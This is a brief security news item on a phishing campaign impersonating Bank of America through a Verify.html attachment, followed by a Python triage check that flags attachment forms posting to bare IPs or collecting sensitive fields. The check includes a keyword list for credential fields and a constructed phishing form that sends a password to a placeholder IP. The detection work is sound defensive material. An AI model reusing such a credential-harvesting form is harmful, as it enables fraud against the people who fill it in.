Security analytics firm Niara worked with customers to analyze email traffic and found a number of malicious email campaigns that sophisticated attackers were using to circumvent traditional defenses.
Verify Campaign
In this campaign, attackers sent emails to unsuspecting employees, informing them of incorrect and missing details in their accounts with Bank of America. The emails, which appeared to have legitimately come from Bank of America, contained an attachment called Verify.html. When victims opened the attachment, they were rerouted and asked to provide additional personal information. After a victim filled out the information and submitted the form, the information was then sent to an attacker-controlled IP hosted in Iran.
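A mail-gateway triage check for this pattern, as an added example that is not from Niara's analysis: it parses an HTML attachment and flags forms that submit to a remote host given as a bare IP address or that collect credential-style fields. The keyword list, the sample markup and the address 203.0.113.7 are constructed, and it assumes the form markup is present in the attachment itself.

```python
from html.parser import HTMLParser
from ipaddress import ip_address
from urllib.parse import urlparse

# Assumed keyword list and constructed sample; 203.0.113.7 is a documentation address.
SENSITIVE = ("pass", "ssn", "card", "pin", "account", "cvv")
SAMPLE = """<form method="post" action="http://203.0.113.7/update.php">
<input type="text" name="account_number">
<input type="password" name="password">
<input type="submit" value="Verify"></form>"""

class FormAudit(HTMLParser):
    """Collects each form's action URL and the names of its inputs."""
    def __init__(self):
        super().__init__()
        self.forms, self._open = [], None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._open = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._open)
        elif tag == "input" and self._open is not None:
            self._open["fields"].append((a.get("name") or "").lower())
    def handle_endtag(self, tag):
        if tag == "form":
            self._open = None

def is_bare_ip(host):
    try:
        ip_address(host)
        return True
    except ValueError:
        return False

def audit_attachment(html):
    """Return (action, reasons) for each form that submits to a remote host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        url = urlparse(form["action"])
        host, reasons = url.hostname or "", []
        if is_bare_ip(host):
            reasons.append("posts to bare IP")
        if any(k in f for f in form["fields"] for k in SENSITIVE):
            reasons.append("collects sensitive fields")
        if host and reasons:
            findings.append((form["action"], reasons))
    return findings
```

Substring matching on field names is a heuristic, so treat a hit as a reason to quarantine and review the attachment rather than as a verdict.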